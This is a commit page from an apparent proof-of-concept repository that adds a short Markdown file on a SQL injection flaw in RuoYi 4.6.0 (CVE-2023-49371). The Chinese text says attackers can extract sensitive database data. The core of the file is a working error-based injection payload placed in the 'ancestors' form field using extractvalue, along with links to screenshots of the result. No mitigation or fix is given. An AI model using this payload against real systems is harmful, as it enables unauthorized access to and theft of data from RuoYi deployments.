admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create RuoYi4.6.0 SQL注入漏洞CVE-2023-49371.md

Browse Source
This commit is contained in:
wy876 2023-12-06 19:28:03 +08:00 committed by GitHub
parent 48fd160e73
commit 7be1fbdc08
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
RuoYi4.6.0 SQL注入漏洞CVE-2023-49371.md Normal file
View File

@ -0,0 +1,11 @@
## RuoYi4.6.0 SQL注入漏洞CVE-2023-49371
若依在4.6版本之前存在SQL注入漏洞攻击者通过该漏洞可以进行SQL注入利用从而获取数据库中的敏感信息
## poc
```
DeptName=1&deptid =100&ParentId=12&Status= 0&ordernum =1&ancestors=0)or(extractvalue(1,concat((select user())))); #
```
![image](https://github.com/wy876/POC/assets/139549762/7c110048-af68-42e5-ba3b-ffb69bb28f17)
![image](https://github.com/wy876/POC/assets/139549762/653098c3-5c6d-45a9-b50a-850b48475662)